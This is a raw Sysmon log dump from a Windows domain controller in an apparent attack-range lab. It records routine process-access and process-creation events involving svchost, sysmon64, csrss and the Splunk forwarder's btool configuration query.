09:20:18.009{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053539Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.009{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053538Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.009{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053537Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.009{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053536Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.009{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053535Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.009{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD2-6151-3F00-00000000FD01}3684C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053534Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.009{5EBD8912-8CD2-6151-3E00-00000000FD01}36643668C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{5EBD8912-8CD2-6151-3F00-00000000FD01}3684C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053533Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.012{5EBD8912-8CD2-6151-3F00-00000000FD01}3684C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5EBD8912-8CD2-6151-3E00-00000000FD01}3664C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000001053532Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD2-6151-3E00-00000000FD01}3664C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053531Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053530Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053529Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053528Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053527Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053526Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053525Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053524Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053523Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053522Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD2-6151-3E00-00000000FD01}3664C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053521Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CD1-6151-3D00-00000000FD01}36523656C:\Windows\system32\cmd.exe{5EBD8912-8CD2-6151-3E00-00000000FD01}3664C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053520Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.005{5EBD8912-8CD2-6151-3E00-00000000FD01}3664C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{5EBD8912-8CD1-6151-3D00-00000000FD01}3652C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000001053519Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD1-6151-3D00-00000000FD01}3652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053518Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053517Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053516Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053515Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053514Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.992{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053513Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 